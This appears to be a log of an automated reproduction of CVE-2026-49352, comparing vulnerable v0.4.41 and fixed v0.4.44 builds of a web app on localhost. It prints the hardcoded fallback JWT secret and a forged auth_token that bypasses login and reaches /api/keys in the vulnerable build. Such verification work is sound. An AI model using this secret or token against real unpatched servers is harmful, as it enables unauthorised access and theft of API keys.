[repro 14:35:34] === CVE-2026-49352 reproduction start === [repro 14:35:34] Project cache dir: /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001 [repro 14:35:34] Vulnerable repo: /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001/repo (v0.4.41) [repro 14:35:34] Fixed repo: /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001/repo-fixed (v0.4.44) [repro 14:35:34] Known hardcoded fallback JWT secret: 9router-default-secret-change-me [repro 14:35:34] vuln: repo already present at /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001/repo [repro 14:35:34] fixed: repo already present at /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001/repo-fixed [repro 14:35:34] vuln: build already present at /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001/repo/.next, reusing [repro 14:35:34] fixed: build already present at /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001/repo-fixed/.next, reusing [repro 14:35:34] Forged auth_token JWT (HS256, secret=9router-default-secret-change-me): eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRoZW50aWNhdGVkIjp0cnVlLCJpYXQiOjE3ODMwODkzMzQsImV4cCI6MTc4MzE3NTczNH0.uEOeRubhsJUdKlmJShtrGGIGdqoaOoKp1a15pjKAbvE [repro 14:35:34] --- VULNERABLE build (v0.4.41) WITHOUT JWT_SECRET --- [repro 14:35:34] Vulnerable server PID=3976 on http://127.0.0.1:20128 [repro 14:35:35] vuln: server healthy (HTTP 200 on /api/auth/status) [repro 14:35:35] VULN /dashboard (no cookie) -> 307 http://127.0.0.1:20128/login (expect 307 -> /login) [repro 14:35:35] VULN /dashboard (forged auth_token)-> 200 (expect 200 = BYPASS) [repro 14:35:35] VULN /api/keys (no cookie) -> 401 (expect 401) [repro 14:35:35] VULN /api/keys (forged auth_token) -> 200 (expect 200 = API access) [repro 14:35:37] --- FIXED build (v0.4.44) WITHOUT JWT_SECRET --- [repro 14:35:37] Fixed server PID=4031 on http://127.0.0.1:20128 [repro 14:35:38] fixed: server healthy (HTTP 200 on /api/auth/status) [repro 14:35:38] FIXED /dashboard (forged auth_token)-> 307 http://127.0.0.1:20128/login (expect 307 -> /login = rejected) [repro 14:35:38] FIXED /api/keys (forged auth_token) -> 401 (expect 401 = rejected) [repro 14:35:40] === Summary === [repro 14:35:40] VULN no-cookie /dashboard : 307 (expect 307) [repro 14:35:40] VULN forged /dashboard : 200 (expect 200 = BYPASS) [repro 14:35:40] VULN forged /api/keys : 200 (expect 200 = API access) [repro 14:35:40] FIXED forged /dashboard : 307 (expect 307 = rejected) [repro 14:35:40] FIXED forged /api/keys : 401 (expect 401 = rejected) [repro 14:35:40] === CVE-2026-49352 CONFIRMED: hardcoded JWT secret enables unauthenticated auth bypass === [repro 14:35:40] Exit 0: vulnerability confirmed